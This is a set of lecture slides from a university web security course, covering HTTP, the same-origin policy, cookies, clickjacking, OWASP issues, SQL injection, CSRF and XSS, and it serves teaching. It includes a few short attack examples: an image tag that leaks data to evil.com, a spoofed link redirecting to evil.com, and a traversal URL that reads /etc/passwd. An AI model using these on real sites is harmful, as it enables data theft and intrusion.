Lecture 8-10 – Web Security

Dr. Cong Wang

CS Department
City University of Hong Kong
Slides partially adapted from lecture notes by M. Goodrich&R. Tamassia,
W. Stallings&L. Brown, Dan Boneh, and Dawn Song.
CS4293 Topics on Cybersecurity 1
 Reported Web Vulnerabilities "In the Wild"

Data from aggregator and validator of NVD-reported vulnerabilities

CS4293 Topics on Cybersecurity 2

Web application vulnerabilities

CS4293 Topics on Cybersecurity 3

 Web programming poll
• Familiar with basic html?
• Developed a web application using:
– Apache? PHP? Ruby?
– SQL?
– JavaScript? CSS?
– Ajax? JSON?

• Resource: http://www.w3schools.com/

CS4293 Topics on Cybersecurity 4

 Content on Web security
• Browser security model
– The browser as an OS and execution platform
– Basic http: headers, cookies
– Browser UI and security indicators
• Authentication and session management
– How users authenticate to web sites
– Browser-server mechanisms for managing state
• Web application security
– Application pitfalls and defenses
• HTTPS: goals and pitfalls
– Network issues and browser protocol handling

Web security section could fill an entire course;

We will briefly cover selected topics.

CS4293 Topics on Cybersecurity 5

INTRODUCTION

CS4293 Topics on Cybersecurity 6

CS4293 Topics on Cybersecurity 7
 URLs
• Global identifiers of network-retrievable documents

• Example:
http://stanford.edu:81/class?name=cs155#homework

Protocol
Fragment

Hostname
Port Path
Query

• Special characters are encoded as hex:

– %0A = newline
– %20 or + = space, %2B = + (special exception)
CS4293 Topics on Cybersecurity 8
 HTTP Request
Method File HTTP version Headers

GET /index.html HTTP/1.1

Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

Blank line
Data – none for GET

GET : no side effect POST : possible side effect

CS4293 Topics on Cybersecurity 9
 HTTP etc. – a quick reminder
Web browser GET /index.html HTTP/1.1 Web server
(IE, Firefox…) (Apache, IIS…)
HTTP/1.1 200 OK

POST login.php HTTP/1.1

Referer: index.html
[…]
Executing PHP
username=abc&password=def
login.php
HTTP/1.1 200 OK
Set-Cookie: SessionId=87325

executing
JavaScript GET /list.php?id=3 HTTP/1.1
Cookie: SessionId=87325

HTTP/1.1 200 OK

CS4293 Topics on Cybersecurity 10

 HTTP Response
HTTP version Status code Reason phrase Headers

HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html Data
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>

Cookies

CS4293 Topics on Cybersecurity 11

CS4293 Topics on Cybersecurity 12
 Rendering and events
• Basic execution model
– Each browser window or frame
• Loads content
• Renders
– Processes HTML and scripts to display page
– May involve images, subframes, etc.
• Responds to events
• Events can be
– User actions: OnClick, OnMouseover
– Rendering: OnLoad, OnBeforeUnload
– Timing: setTimeout(), clearTimeout()
CS4293 Topics on Cybersecurity 13
 Document Object Model (DOM)

• Also Browser Object Model (BOM)

– window, document, frames[], history, location, navigator
(type and version of browser)
CS4293 Topics on Cybersecurity 14
 Pages can embed content from
many sources
• Frames: <iframe src=“//site.com/frame.html” > </iframe>

• Scripts: <script src=“//site.com/script.js” > </script>

• CSS:
<link rel="stylesheet" type="text /css” href=“//site/com/theme.css" />

• Objects (flash): [using swfobject.js script ]

<script> var so = new SWFObject(‘//site.com/flash.swf', …);
so.addParam(‘allowscriptaccess', ‘always');
so.write('flashdiv');
</script>

CS4293 Topics on Cybersecurity 15

CS4293 Topics on Cybersecurity 16
CS4293 Topics on Cybersecurity 17
 HTML Image Tags
<html>
…
<p> … </p>
…
<img src=“http://example.com/sunset.gif” height="50" width="100">
…
</html>

Displays this nice picture è

Security issues?

CS4293 Topics on Cybersecurity

18
 Image tag security issues
• Communicate with other sites
– <img src=“http://evil.com/pass-local-
information.jpg?extra_information”>
• Hide resulting image
– <img src=“ … ” height=“1" width=“1">
• Spoof other sites
– Add logos that fool a user

Important Point: A web page can send information to any site

CS4293 Topics on Cybersecurity

19
WEB SECURITY GOALS AND
THREAT MODEL

CS4293 Topics on Cybersecurity 20

 Goals of web security
• Safely browse the web
– Users should be able to visit a variety of web sites,
without incurring harm:
• No stolen information (without user’s permission)
• Site A cannot compromise session at Site B
• Secure web applications
– Applications delivered over the web should have the
same security properties we require for stand-alone
applications

• Other ideas?

CS4293 Topics on Cybersecurity 21

An Example

CS4293 Topics on Cybersecurity 22

 Operating
Operating system
system security
security

System

Alice

OS Attacker

May control malicious

files and applications

CS4293 Topics on Cybersecurity 23

Network security

Network Attacker

System Intercepts and

controls network
communication

Alice CS4293 Topics on Cybersecurity 24

Web security

System

Web Attacker

Sets up malicious site

visited by victim; no
control of network

Alice CS4293 Topics on Cybersecurity 25

 Web Threat Models
• Web attacker
– Control attacker.com
– Can obtain SSL/TLS certificate for attacker.com
– User visits attacker.com
• Or: runs attacker’s Facebook app
• Network attacker
– Passive: Wireless eavesdropper
– Active: Evil router, DNS poisoning
• OS/Malware attacker
– Attacker escapes browser isolation mechanisms
and run separately under control of OS
CS4293 Topics on Cybersecurity 26
 Web Security ‘History’
• The web is an example of “bolt-on security”
• Originally, the web was invented to allow physicists to
share their research papers
– Only textual web pages + links to other pages;
– No security model
• Then we added embedded images
– Crucial decision: a page can embed images loaded from
another web server
• Then, audio/video, Javascript, dynamic HTML, AJAX,
CSS, plug-ins, …
• Today, a web site is a distributed application

CS4293 Topics on Cybersecurity 27

 Goals of web security (Revisited)
• Safely browse the web
– Users should be able to visit a variety of web sites, without incurring harm:
• No stolen information (without user’s permission)
• Site A cannot compromise session at Site B
• Secure web applications
– Applications delivered over the web should have the same security properties
we require for stand-alone applications
– https – http over SSL (Secure Socket Layer)
• provides encryption for the browser-server traffic
• prevents eavesdropping, and man-in-the-middle attacks (if certificate verification is done
correctly)
• helps users ensure the authenticity of the server
• Does not prevent attacks on the client side (Cross-site scripting) or the server side (SQL
Injection)
– Basic http authentication:
• weak, limited functionality
• use only if really needed, and only over https

• Is that not it?

CS4293 Topics on Cybersecurity 28

 Focus on Web applications – why?
Web applications are:
• often much more useful than desktop software => popular
• often publicly available
• easy target for attackers
– finding vulnerable sites, automating and scaling attacks

• easy to develop
• not so easy to develop well and securely

• often vulnerable, thus making the server, the database,

internal network, data etc. insecure

CS4293 Topics on Cybersecurity 29

 Threats
• Web defacement
Þ loss of reputation (clients, shareholders)
Þ fear, uncertainty and doubt
• information disclosure (lost data confidentiality)
e.g. business secrets, financial information, client database, medical data,
government documents
• data loss (or lost data integrity)
• unauthorized access
Þ functionality of the application abused
• denial of service
Þ loss of availability or functionality (and revenue)
• “foot in the door” (attacker inside the firewall)

CS4293 Topics on Cybersecurity 30

 OWASP Top 10
• Open Web Application Security Project

CS4293 Topics on Cybersecurity 31

 A2: Broken authn & session mgmt
• Understand session hijacking techniques, e.g.:
– session fixation (attacker sets victim’s session id)
– stealing session id: eavesdropping (if not https), XSS
• Trust the solution offered by the platform / language
– and follow its recommendations (for code, configuration etc.)
• Additionally:
– generate new session ID on login (do not reuse old ones)
– use cookies for storing session id
– set session timeout and provide logout possibility
– consider enabling “same IP” policy (not always possible)
– check referer (previous URL), user agent (browser version)
– require https (at least for the login / password transfer)

CS4293 Topics on Cybersecurity 32

 A4: Insecure Direct Object Reference
• Attacker manipulates the URL or form values
to get unauthorized access
– to objects (data in a database, objects in memory etc.):
http://shop.com/cart?id=413246 (your cart)
http://shop.com/cart?id=123456 (someone else’s cart ?)
– to files:
http://s.ch/?page=home -> home.php
http://s.ch/?page=/etc/passwd%00 -> /etc/passwd
• Solution:
– avoid exposing IDs, keys, filenames string ends at
to users if possible %00, so .php
not added
– validate input, accept only correct values
– verify authorization to all accessed objects (files, data etc.)

CS4293 Topics on Cybersecurity 33

 A7: Missing Function Level Access
Control
• “Hidden” URLs that don’t require further authorization
– to actions:
http://site.com/admin/adduser?name=x&pwd=x
(even if http://site.com/admin/ requires authorization)
– to files:
http://site.com/internal/salaries.xls
http://me.com/No/One/Will/Guess/82534/me.jpg

• Problem: missing authorization

• Solution
– add missing authorization J
– don‘t rely on security by obscurity – it will not work!
CS4293 Topics on Cybersecurity 34
ISOLATION

CS4293 Topics on Cybersecurity 35

CS4293 Topics on Cybersecurity 36
 Running Remote Code is Risky
• Integrity
– Compromise your machine
– Install malware rootkit
– Transact on your accounts

• Confidentiality
– Read your information
– Steal passwords
= a must
– Read your email Isolation is Indispensable

CS4293 Topics on Cybersecurity

37
 20 yrs ago, old linux doesnt have this kind of solution App in OS also has the isolation

Determine which web app can access and not

Isolation is a sandbox

CS4293 Topics on Cybersecurity 38

 Frame and iFrame
• Window may contain frames from different
sources
– Frame: rigid division as part of frameset
– iFrame: floating inline frame
• iFrame example
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>

• Why use frames?

– Delegate screen area to content from another source
– Browser provides isolation based on frames
– Parent may work even if frame is broken

CS4293 Topics on Cybersecurity 39

 Browser Sandbox
• Goal
– Run remote web applications safely
– Limited access to OS, network, and browser data

• Approach
– Isolate sites in different security contexts
– Browser manages resources, like an OS

CS4293 Topics on Cybersecurity

40
CS4293 Topics on Cybersecurity 41
 Same Origin Policy
Imported scripts have the same origin policy as that page

Set the origin policy to isolate

different browsers

CS4293 Topics on Cybersecurity 42

 Browser security mechanism
• Each frame of a page has an
origin
– Origin = protocol://host:port
• Frame can access its own
origin
– Network access, Read/write
DOM, Storage (cookies)
• Frame cannot access data
associated with a different
origin

CS4293 Topics on Cybersecurity 43

Origin of Browser Primitives

Load external script: it will be detected as origin of that page.

This JS can do hijacking, since it has the original permission
<script
VeriSign src=https://seal.verisign.com/ge
tseal?host_name=a.com></script>
CS4293 Topics on Cybersecurity 44
Same Origin Policy To isolate content retrieved
by different parties

CS4293 Topics on Cybersecurity 45

When is it safe to type my password?

SECURITY USER INTERFACE

CS4293 Topics on Cybersecurity 46

Safe to type your password?

CS4293 Topics on Cybersecurity

47
Safe to type your password?

CS4293 Topics on Cybersecurity

48
Safe to type your password?

CS4293 Topics on Cybersecurity

49
Safe to type your password?
???

???
CS4293 Topics on Cybersecurity
50
Safe to type your password?

CS4293 Topics on Cybersecurity

51
 Mixed Content: HTTP and HTTPS
• Problem
– Page loads over HTTPS, but has HTTP content
– Network attacker can control page
• IE: displays mixed-content dialog to user
– Flash files over HTTP loaded with no warning (!)
– Note: Flash can script the embedding page
• Firefox: red slash over lock icon (no dialog)
– Flash files over HTTP do not trigger the slash
• Safari: does not detect mixed content
Still current?
CS4293 Topics on Cybersecurity 52
Mixed Content: HTTP and HTTPS
silly dialogs

CS4293 Topics on Cybersecurity 53

 Mixed content and network attacks
• banks: after login all content over HTTPS
– Developer error: Somewhere on bank site write
<script src=http://www.site.com/script.js> </script>
– Active network attacker can now hijack any session

• Better way to include content:

<script src=//www.site.com/script.js> </script>
– served over the same protocol as embedding page

CS4293 Topics on Cybersecurity 54

 Lock Icon 2.0
• Extended validation (EV) certs

This URL hasn’t inherited the full origin

from the browser, so the URL is yellowed
• Prominent security indicator for EV certificates

• note: EV site loading content from non-EV site does

not trigger mixed content warning
 Finally: the status Bar

= Easy to fake you

• Trivially spoofable
<a href=“http://www.paypal.com/”
onclick=“this.href = ‘http://www.evil.com/’;”>
PayPal</a>
Clickjacking
Example: Delete Twitter account
 Clickjacking Aspects
• Comprise visual integrity of target
– Hide target
– Partial overlay
• Compromise visual integrity of pointer
– Manipulate pointer feedback
Example: User Webcam
Fake link to lead to an access requirement of
webcam
 ClickJacking Defence
• Require confirmation for actions (annoys users)
• Frame-busting: Web site ensures that its
“vulnerable” pages can’t be included as a frame
inside another browser frame
– So user can’t be looking at it with something
invisible overlaid on top …
– … nor have the site invisible above something else
– Conceptually implemented with Javascript like:
If (top.location != self.location)
top.location=self.location;
(Note: actually quite tricky to get this right!)"
COOKIES: CLIENT STATE

CS4293 Topics on Cybersecurity

62
 Cookies
• Used to store state on user’s machine
POST …
Browser
Server
HTTP Header:
Set-cookie: NAME=VALUE ;
domain = (who can read) ;
If expires=NULL: expires = (when expires) ;
this session only secure = (only over SSL)

Browser POST …
Server
Cookie: NAME = VALUE

CS4293 Topics on Cybersecurity 63

HTTP is stateless protocol; cookies add state
 Cookie authentication
Browser Web Server Auth server

POST login.cgi
Username & pwd Validate user

Set-cookie: auth=val auth=val

Store val

GET restricted.html
Cookie: auth=val restricted.html
auth=val Check val

If YES, YES/NO
restricted.html

CS4293 Topics on Cybersecurity 64

 Cookie Security Policy
• Uses:
– User authentication
– Personalization
– User tracking: e.g. Doubleclick (3rd party cookies)

• Browser will store:

– At most 20 cookies/site, 3 KB / cookie

• Origin is the tuple <domain, path>

– Can set cookies valid across a domain suffix
CS4293 Topics on Cybersecurity 65
 Secure Cookies
GET …
Browser
Server
HTTP Header:
Set-cookie: NAME=VALUE ;
Secure=true

• Provides confidentiality against network attacker

• Browser will only send cookie back over HTTPS

• … but no integrity
• Can rewrite secure cookies over HTTP
Þ network attacker can rewrite secure cookies
Þ can log user into attacker’s account
CS4293 Topics on Cybersecurity 66
 httpOnly Cookies
GET …
Browser
Server
HTTP Header:
Set-cookie: NAME=VALUE ;
httpOnly

• Cookie sent over HTTP(s), but not accessible to scripts

• cannot be read via document.cookie
• Helps prevent cookie theft via XSS

… but does not stop most other risks of XSS bugs

CS4293 Topics on Cybersecurity 67
Web Application Security

CS4293 Topics on Cybersecurity 68

 Three top web site vulnerabilites
• SQL Injection
– Browser sends malicious input to server Uses SQL to change
– Bad input checking leads to malicious meaning of database
SQL query command

• CSRF – Cross-site request forgery

Leverage user’s session at
– Bad web site sends request to good web victim sever
site, using credentials of an innocent
victim who “visits” site
• XSS – Cross-site scripting
Inject malicious script
– Bad web site sends innocent victim a into trusted context
script that steals information from an
honest web site

CS4293 Topics on Cybersecurity 69